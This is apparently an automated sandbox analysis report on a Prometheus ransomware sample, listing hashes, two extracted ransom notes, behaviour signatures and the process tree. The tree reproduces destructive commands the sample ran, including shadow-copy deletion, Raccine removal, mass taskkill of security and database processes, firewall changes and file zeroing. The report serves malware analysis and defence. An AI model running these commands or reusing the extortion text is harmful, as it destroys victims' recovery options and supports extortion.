Overview

overview

10

Static

static

779db1c725...le.exe

windows7_x64

10

779db1c725...le.exe

windows10_x64

10

Resubmissions

09-06-2021 13:16

210609-r4nkyx7ywn 10

28-05-2021 09:36

210528-w5abwajf3x 10

Analysis

  • max time kernel
    116s
  • max time network
    136s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    28-05-2021 09:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe

  • Size

    233KB

  • MD5

    96c565af56a5ba8339f35121bf9ff196

  • SHA1

    2edae92d476225b00b4a7ea1e9d7f7ccfda462cb

  • SHA256

    779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc

  • SHA512

    6d4a3d91396bccae3dff43f6ee295980c1919a48f7914d9b8b6eca3e603aa97b8e05a0b78af27e7f1c86691fff6fc26fad69ddb774f8ed5d8011aa87b511b6c1

Score
10/10
prometheusevasionpersistenceransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: ____________________________________________________________________________________ You have way: 1) Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM and paste it in the Tor browser. c. Start a chat and follow the further instructions. _____________________________________________________________________________________ Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: ZW6MjIGa5+UbJWIfp5s9xEUQ7yoMVaOXm7qO7jK0EPrt1bh8jUTrtnVTy/Z5vVIcToZjMCUsZbqWE1LYMGfCZHboTQX/XSG14nW1ljedP7zm1zsljcW20BiQzyo7ypZscxyHzXnXiSqca4xO39nSYT+98FLx0PHUi2/FDvVRYXHRGe65n6b6ygsc2PF6jXYj4lbau0WvImaSR5AoL3laZR9YSx8MWn2btzKtXTbblxzcVBmGOfmo9xGOYGEk08wJaA2gGueZEK2uBqv/AALfPIi6nP3OV5jMpZm1/r1Cfli6fJVnrbPk5PVzP+OE8qTvNC4XzGlPwO2vtvmR/add08Zl7+Ti/TsXs93I3dyWCl2Frvet49jjYLgPUMvtGIJZWamqqXUM1po1jKacL+jMl5OuKS9x91tVxzb78UlETP5wgdwALCeCdJMWIKgSSLMhI1bY8OOA4b6CPE57hROPy+LzbJJxpwQUuWHNWBgyyLcxkfrhijUAnjQC+Jqoeg06jyd84ub2sTskfw0hli5kxPj/WzkfTe69EpAj/ZMtVZ7HVL1/k0rOBUPvKIJPmdS+ECgKTIO/OOQh6zns9hUvF1kGokJzSkWY0FgCRKJ7DUPmdnEJkr4xWzX29CsOoP3BTfC04WrVo/+Q5CSnZuV3dFpEtuE2rVIu5CkdXG4sGo0=
URLs

http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it’s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: You have way: 1) Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM and paste it in the Tor browser. c. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: ZW6MjIGa5+UbJWIfp5s9xEUQ7yoMVaOXm7qO7jK0EPrt1bh8jUTrtnVTy/Z5vVIcToZjMCUsZbqWE1LYMGfCZHboTQX/XSG14nW1ljedP7zm1zsljcW20BiQzyo7ypZscxyHzXnXiSqca4xO39nSYT+98FLx0PHUi2/FDvVRYXHRGe65n6b6ygsc2PF6jXYj4lbau0WvImaSR5AoL3laZR9YSx8MWn2btzKtXTbblxzcVBmGOfmo9xGOYGEk08wJaA2gGueZEK2uBqv/AALfPIi6nP3OV5jMpZm1/r1Cfli6fJVnrbPk5PVzP+OE8qTvNC4XzGlPwO2vtvmR/add08Zl7+Ti/TsXs93I3dyWCl2Frvet49jjYLgPUMvtGIJZWamqqXUM1po1jKacL+jMl5OuKS9x91tVxzb78UlETP5wgdwALCeCdJMWIKgSSLMhI1bY8OOA4b6CPE57hROPy+LzbJJxpwQUuWHNWBgyyLcxkfrhijUAnjQC+Jqoeg06jyd84ub2sTskfw0hli5kxPj/WzkfTe69EpAj/ZMtVZ7HVL1/k0rOBUPvKIJPmdS+ECgKTIO/OOQh6zns9hUvF1kGokJzSkWY0FgCRKJ7DUPmdnEJkr4xWzX29CsOoP3BTfC04WrVo/+Q5CSnZuV3dFpEtuE2rVIu5CkdXG4sGo0=
URLs

http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM

Signatures

  • Prometheus Ransomware

    Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.

    ransomwareprometheus
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Drops startup file 1 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
    evasion
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:860
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2624
    • C:\Windows\SYSTEM32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:192
      • C:\Windows\SYSTEM32\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:764
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:3592
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
            PID:1600
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config SQLTELEMETRY start= disabled
            2⤵
              PID:1416
            • C:\Windows\SYSTEM32\sc.exe
              "sc.exe" config FDResPub start= auto
              2⤵
                PID:1016
              • C:\Windows\SYSTEM32\sc.exe
                "sc.exe" config SSDPSRV start= auto
                2⤵
                  PID:1364
                • C:\Windows\SYSTEM32\netsh.exe
                  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                  2⤵
                    PID:2176
                  • C:\Windows\SYSTEM32\sc.exe
                    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                    2⤵
                      PID:3292
                    • C:\Windows\SYSTEM32\sc.exe
                      "sc.exe" config SstpSvc start= disabled
                      2⤵
                        PID:3496
                      • C:\Windows\SYSTEM32\sc.exe
                        "sc.exe" config upnphost start= auto
                        2⤵
                          PID:3632
                        • C:\Windows\SYSTEM32\sc.exe
                          "sc.exe" config SQLWriter start= disabled
                          2⤵
                            PID:3640
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM mspub.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:940
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM synctime.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2304
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM mspub.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1516
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM mydesktopqos.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3900
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM mysqld.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1972
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM Ntrtscan.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2324
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM sqbcoreservice.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1880
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM mydesktopservice.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2880
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM isqlplussvc.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2232
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM firefoxconfig.exe /F
                            2⤵
                            • Kills process with taskkill
                            PID:2148
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM encsvc.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3536
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM onenote.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3212
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM tbirdconfig.exe /F
                            2⤵
                            • Kills process with taskkill
                            PID:3116
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM agntsvc.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3444
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM excel.exe /F
                            2⤵
                            • Kills process with taskkill
                            PID:1856
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM PccNTMon.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2292
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM dbeng50.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1272
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM CNTAoSMgr.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2180
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM thebat.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2072
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM thebat64.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:740
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM msaccess.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3900
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2148
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM sqlwriter.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3508
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM steam.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2220
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM outlook.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2724
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM ocomm.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:788
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM tmlisten.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:188
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" IM thunderbird.exe /F
                            2⤵
                            • Kills process with taskkill
                            PID:3188
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM wordpad.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2624
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM dbsnmp.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1600
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3116
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM infopath.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1016
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM msftesql.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3916
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM mysqld-opt.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1856
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM xfssvccon.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3612
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM mbamtray.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2612
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM powerpnt.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2340
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM ocautoupds.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1416
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM zoolz.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3992
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM mydesktopqos.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:60
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM ocssd.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3592
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM visio.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2308
                          • C:\Windows\SYSTEM32\taskkill.exe
                            "taskkill.exe" /IM oracle.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3820
                          • C:\Windows\SYSTEM32\netsh.exe
                            "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                            2⤵
                              PID:1688
                            • C:\Windows\SYSTEM32\taskkill.exe
                              "taskkill.exe" /IM mydesktopservice.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3640
                            • C:\Windows\SYSTEM32\taskkill.exe
                              "taskkill.exe" /IM sqlagent.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3884
                            • C:\Windows\SYSTEM32\taskkill.exe
                              "taskkill.exe" /IM sqlbrowser.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2192
                            • C:\Windows\SYSTEM32\taskkill.exe
                              "taskkill.exe" /IM winword.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3548
                            • C:\Windows\SYSTEM32\taskkill.exe
                              "taskkill.exe" /IM sqlservr.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2148
                            • C:\Windows\SYSTEM32\taskkill.exe
                              "taskkill.exe" /IM mysqld-nt.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:184
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                              2⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1856
                            • C:\Windows\SYSTEM32\arp.exe
                              "arp" -a
                              2⤵
                                PID:3212
                              • C:\Windows\SYSTEM32\cmd.exe
                                "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                2⤵
                                  PID:736
                                • C:\Windows\System32\mshta.exe
                                  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                                  2⤵
                                    PID:1204
                                  • C:\Windows\SYSTEM32\cmd.exe
                                    "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                    2⤵
                                      PID:1876
                                      • C:\Windows\system32\PING.EXE
                                        ping 127.0.0.7 -n 3
                                        3⤵
                                        • Runs ping.exe
                                        PID:2724
                                      • C:\Windows\system32\fsutil.exe
                                        fsutil file setZeroData offset=0 length=524288 “%s”
                                        3⤵
                                          PID:644
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.sample.exe
                                        2⤵
                                          PID:3548
                                          • C:\Windows\system32\choice.exe
                                            choice /C Y /N /D Y /T 3
                                            3⤵
                                              PID:2256

                                        Network

                                        MITRE ATT&CK Enterprise v6

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                                          Filesize

                                          22KB

                                          MD5

                                          c8a691a524b123d097075cf69adf7a99

                                          SHA1

                                          617cb5a03a9483f16eb87d9377c2adda64e0574f

                                          SHA256

                                          5a34124d8dd61ca3d2b98eb5555668718c7730d0a496d24b113c9512d460c7b9

                                          SHA512

                                          d330ae81d8d56099a8f4024cb2740b8464e32541569fccf46a2579a9db41e8d109a2c9f44192a0f0268c3ce7de7a036f3b25e64ee27bebb7cbc6a866267f77b3

                                          Download Submit

                                        • memory/60-167-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/184-177-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/188-155-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/192-118-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/736-203-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/740-149-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/764-119-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/788-154-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/860-116-0x000000001AFB0000-0x000000001AFB2000-memory.dmp

                                          Filesize

                                          8KB

                                          Download

                                        • memory/860-114-0x00000000002C0000-0x00000000002C1000-memory.dmp

                                          Filesize

                                          4KB

                                          Download

                                        • memory/940-130-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1016-123-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1016-159-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1272-146-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1364-124-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1416-165-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1416-122-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1516-132-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1600-158-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1600-121-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1688-171-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1856-187-0x0000021D64E63000-0x0000021D64E65000-memory.dmp

                                          Filesize

                                          8KB

                                          Download

                                        • memory/1856-202-0x0000021D64E66000-0x0000021D64E68000-memory.dmp

                                          Filesize

                                          8KB

                                          Download

                                        • memory/1856-186-0x0000021D64E60000-0x0000021D64E62000-memory.dmp

                                          Filesize

                                          8KB

                                          Download

                                        • memory/1856-161-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1856-178-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1856-185-0x0000021D64D70000-0x0000021D64D71000-memory.dmp

                                          Filesize

                                          4KB

                                          Download

                                        • memory/1856-144-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1856-190-0x0000021D65900000-0x0000021D65901000-memory.dmp

                                          Filesize

                                          4KB

                                          Download

                                        • memory/1880-136-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/1972-134-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2072-148-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2148-139-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2148-176-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2176-125-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2180-147-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2192-174-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2220-152-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2232-138-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2292-145-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2304-131-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2308-169-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2324-135-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2340-164-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2612-163-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2624-157-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2624-117-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2724-153-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/2880-137-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3116-142-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3188-156-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3212-184-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3212-141-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3292-126-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3444-143-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3496-127-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3508-151-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3536-140-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3548-175-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3592-168-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3592-120-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3612-162-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3632-128-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3640-129-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3640-172-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3820-170-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3884-173-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3900-150-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3900-133-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3916-160-0x0000000000000000-mapping.dmp

                                          Download

                                        • memory/3992-166-0x0000000000000000-mapping.dmp

                                          Download